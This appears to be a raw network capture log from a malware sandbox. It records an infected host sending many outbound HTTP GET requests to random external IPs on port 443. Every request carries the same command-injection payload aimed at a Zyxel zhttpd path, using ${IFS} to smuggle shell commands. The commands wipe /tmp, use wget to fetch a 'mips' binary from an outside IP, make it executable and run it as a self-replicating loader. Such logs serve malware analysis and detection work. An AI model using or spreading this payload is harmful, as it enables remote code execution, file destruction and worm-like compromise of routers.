                              Mar 31, 2024 08:41:51.128869057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6777192.168.2.1353978204.46.79.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128911972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6778192.168.2.133798058.205.69.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128957033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6779192.168.2.1339428209.78.56.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128988028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6780192.168.2.134125247.251.62.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129015923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6781192.168.2.135103468.85.38.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129070997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6782192.168.2.1337014207.143.88.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129106045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6783192.168.2.1344842100.61.44.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129148006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6784192.168.2.134654657.170.193.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129199028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6785192.168.2.1351404134.251.211.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129230976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6786192.168.2.1353426167.101.60.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129246950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6787192.168.2.1356168124.208.134.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129300117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6788192.168.2.133547096.148.179.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129321098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6789192.168.2.13561609.106.14.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129373074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6790192.168.2.1348986117.2.178.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129414082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6791192.168.2.1358534201.219.20.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129450083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6792192.168.2.133640450.131.35.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129486084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6793192.168.2.135724860.177.125.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129530907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6794192.168.2.135676236.137.99.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129580975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6795192.168.2.133562448.62.202.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129621029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6796192.168.2.135156245.231.93.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129653931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6797192.168.2.134119477.141.138.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129709959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6798192.168.2.135725287.232.108.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129750967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6799192.168.2.1335878122.85.133.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129786015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6800192.168.2.1349806171.187.215.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129833937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6801192.168.2.1339990213.185.211.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129875898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6802192.168.2.134610241.204.155.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129903078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6803192.168.2.133917432.64.211.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129952908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6804192.168.2.13435308.77.78.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.129995108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6805192.168.2.133946468.82.239.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130028009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6806192.168.2.1332926173.147.115.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130078077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6807192.168.2.135853691.194.17.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130108118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6808192.168.2.1347012204.239.73.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130134106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6809192.168.2.133553238.168.179.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130187035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6810192.168.2.1357514119.149.11.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130225897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6811192.168.2.135028869.190.59.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130264997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6812192.168.2.1339692174.26.95.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130320072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6813192.168.2.133836840.195.228.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130336046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6814192.168.2.1337120219.226.250.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130384922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6815192.168.2.1337082108.46.22.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130413055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6816192.168.2.1350542153.7.225.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130479097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6817192.168.2.1343602105.104.116.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130518913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6818192.168.2.1335584198.112.179.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130569935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6819192.168.2.1338662195.102.29.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130606890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6820192.168.2.134849648.214.239.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130701065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6821192.168.2.135138278.155.32.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130740881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6822192.168.2.1358080180.149.53.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130770922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6823192.168.2.134135089.156.209.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130814075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6824192.168.2.1337802216.2.217.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130873919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6825192.168.2.134955494.97.110.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130898952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6826192.168.2.134529251.184.216.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130954027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6827192.168.2.135435075.20.61.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.130990982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6828192.168.2.1359960103.135.21.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131052017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6829192.168.2.1350318102.67.173.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131105900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6830192.168.2.1338920153.17.28.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131130934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6831192.168.2.133795244.44.82.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131186008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6832192.168.2.1360858196.146.11.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131237030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6833192.168.2.1335174221.102.81.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131259918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6834192.168.2.1341742110.144.75.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131318092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6835192.168.2.135469876.58.103.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131362915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6836192.168.2.1356180151.25.149.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131395102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6837192.168.2.1360874176.251.35.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131427050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6838192.168.2.1358058180.200.209.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131474018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6839192.168.2.1350902123.162.30.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131525040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6840192.168.2.1336430117.67.18.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131555080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6841192.168.2.1332854105.197.174.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131584883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6842192.168.2.133908852.185.230.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131644011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6843192.168.2.135021091.24.231.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131675959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6844192.168.2.1350914201.4.86.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131725073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6845192.168.2.1333068150.120.243.75443
                              TimestampBytes transferredDirectionData
